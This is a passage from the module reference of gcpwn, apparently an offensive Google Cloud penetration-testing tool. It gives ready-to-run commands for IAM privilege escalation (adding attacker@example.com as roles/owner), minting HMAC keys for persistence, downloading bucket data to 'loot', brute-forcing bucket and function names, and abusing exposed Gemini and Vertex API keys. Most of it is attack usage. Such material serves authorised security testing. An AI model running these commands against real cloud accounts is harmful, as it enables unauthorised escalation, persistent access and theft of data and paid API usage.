modules run exploit_service_account_keys --create --sa projects/proj1/serviceAccounts/app@proj1.iam.gserviceaccount.com --assume gcpwn --module exploit_service_account_keys --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --create --sa projects/proj1/serviceAccounts/app@proj1.iam.gserviceaccount.com --assume
-
Service Group:
Everything -
What It Does: Unified
setIamPolicyexploit that adds a chosen principal at a chosen role to the IAM policy of a target resource (org/folder/project, bucket, function, instance, secret, Cloud Run, Artifact Registry, KMS, Pub/Sub, Service Directory, Cloud Tasks). The core privilege-escalation primitive for granting yourself or a controlled SA elevated access. -
Key Flags:
--service <type>(resource type; interactive prompt if omitted),--resource <full-name>or service-specific name flags (e.g.--bucket,--function-name,--instance-name,--secret-name,--cloudrun-service-name,--kms-key-name,--topic-name),--member user:<email>|serviceAccount:<email>,--role roles/<x>or--default-role,--overwrite(dangerous: may replace whole policy),-v/--debug. Runmodules run exploit_gcp_setiampolicy -hfor full options. -
Example:
modules run exploit_gcp_setiampolicy --service project --resource projects/12345 --member user:attacker@example.com --role roles/owner gcpwn --module exploit_gcp_setiampolicy --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --service bucket --bucket target-bucket --member serviceAccount:sa1@proj.iam.gserviceaccount.com --default-role
-
Service Group:
Cloud Storage - What It Does: Mints an HMAC key tied to a service account (long-lived S3-style credentials for persistence), then uses it to enumerate/download bucket data through the S3-compatible XML API; can also reuse or toggle the state of an existing HMAC key.
-
Key Flags:
--buckets/--blobs(enumerate buckets/objects over the XML API),--access-id+--hmac-secret(operate with an existing HMAC key),--download(pull object bytes to loot),-v/--debug. Runmodules run exploit_storage_hmac -hfor full options. -
Example:
modules run exploit_storage_hmac --buckets --blobs --download gcpwn --module exploit_storage_hmac --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --buckets --blobs --download
-
Service Group:
Everything - What It Does: Placeholder module intended to analyze vulnerabilities from processed IAM bindings; currently a stub that prints "coming soon" and performs no analysis. All flags are reserved for future use.
-
Key Flags:
-v/--debug,--txt,--csv,--silent,--output(all reserved/no-op today). Runmodules run analyze_vulns -hfor full options. -
Example:
modules run analyze_vulns gcpwn --module analyze_vulns --workspace WORKSPACE_NAME --cred CRED_NAME --current-project
-
Service Group:
Everything - What It Does: Reports the consolidated per-member (inverted) IAM view — every principal and the roles/assets they hold — from already-enumerated bindings, optionally re-materializing/refreshing them first. Used to review effective access and surface over-privileged principals for attack-path planning.
-
Key Flags:
--force-refresh-bindings(re-enumerate IAM bindings before reporting), output selectors--txt/--csv/--silent/--output <dir>,-v/--debug. Runmodules run process_gcp_iam_bindings -hfor full options. -
Example:
modules run process_gcp_iam_bindings --force-refresh-bindings --output ./iam_report gcpwn --module process_gcp_iam_bindings --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --force-refresh-bindings --output ./iam_report
-
Service Group:
API Keys - What It Does: Unauthenticated scanner (ported from ozguralp/gmapsapiscanner) that probes ~40 Google Maps/Places/Roads/Routes plus Gemini Files/Cached-Contents and Vertex CountTokens REST endpoints with a supplied API key to determine which paid/data-leak scopes it can reach; caches results per workspace and surfaces the project number leaked in error responses.
-
Key Flags:
--api-key/-a(key to test; prompts if omitted),--proxy/-p(HTTP/HTTPS/SOCKS proxy URL),--insecure(disable TLS verification for intercepting proxies like Burp),-v/--debug. Runmodules run unauth_apikey_enum_all_scopes -hfor full options. -
Example:
gcpwn --module unauth_apikey_enum_all_scopes --api-key AIzaSyExampleKey1234567890 --proxy http://127.0.0.1:8080 --insecure
-
Service Group:
API Keys - What It Does: Unauthenticated post-exploitation of an exposed Gemini (generativelanguage) API key: lists (and optionally downloads) uploaded Files and Cached Contents, exercises countTokens/embedContent, discovers live models via models.list, and can send a prompt through generate_content; can auto-select a previously-captured Gemini-capable key from the workspace.
-
Key Flags:
--api-key/-a(prompts / picks a cached vulnerable key if omitted),--question+--question-model(send a generate_content prompt),--token-model/--embedding-model/--sample-text,--model-scan-mode {single,all},--page-size,--insecure,-v/--debug(file/cache downloads are offered interactively). Runmodules run unauth_apikey_gemini_exploit -hfor full options. -
Example:
gcpwn --module unauth_apikey_gemini_exploit --api-key AIzaSyExampleKey1234567890 --question "list any secrets you can see" --model-scan-mode all
-
Service Group:
API Keys - What It Does: Unauthenticated abuse of an exposed Vertex AI express-mode API key: discovers working publisher models on aiplatform.googleapis.com and drops into an interactive query shell to submit prompts against Google publisher models; can auto-select a previously-captured Vertex-capable key from the workspace.
-
Key Flags:
--api-key/-a(prompts / picks a cached vulnerable key if omitted),--model/-m(specific publisher model),--model-discovery-mode {first,all}(first= first working model from the bundled list;all= probe full list then choose),--insecure,-v/--debug. Runmodules run unauth_apikey_vertex_exploit -hfor full options. -
Example:
gcpwn --module unauth_apikey_vertex_exploit --api-key AIzaSyExampleKey1234567890 --model-discovery-mode all
-
Service Group:
Cloud Storage - What It Does: A port of Rhino Security Labs' GCPBucketBrute: brute-forces Cloud Storage bucket names from a keyword/wordlist and checks each candidate for anonymous (unauthenticated) access and permission misconfigurations — no credentials required.
-
Key Flags:
--keyword/-kand--wordlist/-w(candidate source),--check/--check-list(anonymous permission checks),--authenticated(add authenticated checks),--subprocesses/-sand--throttle(concurrency/rate),--out-file/-oand--all-tlds(output / candidate expansion),-v/--debug. Runmodules run unauth_bucketbrute -hfor full options. -
Example:
gcpwn --module unauth_bucketbrute --keyword acme --check --subprocesses 10
-
Service Group:
Cloud Functions -
What It Does: Unauthenticated brute-force of Cloud Functions HTTPS endpoints (
https://<region>-<project>.cloudfunctions.net/...) across known v1/v2 regions and a name permutation wordlist, checking each for anonymous/external reachability. Finds publicly invokable functions with no credentials. -
Key Flags:
--region <region>(limit to one region, else all known); target selection--check <name>(repeatable) |--check-list <file>|-w/--wordlist <file>;-s/--subprocesses N(default 5);-v/--debug. Runmodules run unauth_functionbrute -hfor full options. -
Example:
gcpwn --module unauth_functionbrute --region us-central1 -w wordlist.txt -s 10
modules run enum_all --iam
modules run enum_gcp_policy_bindings --ensure-tree
modules run process_gcp_iam_bindings
modules run process_og_gcpwn_data --expand-inherited --reset --out ./gcpwn_output/opengraph- Authentication Reference
- Workspace Instructions
- Google Workspace Enumeration
- CLI Module Reference
- Downloads to Disk
- Logging & Verbosity
- Data View/Export
- IAM Enumeration and Analysis Workflow
- Troubleshooting and FAQ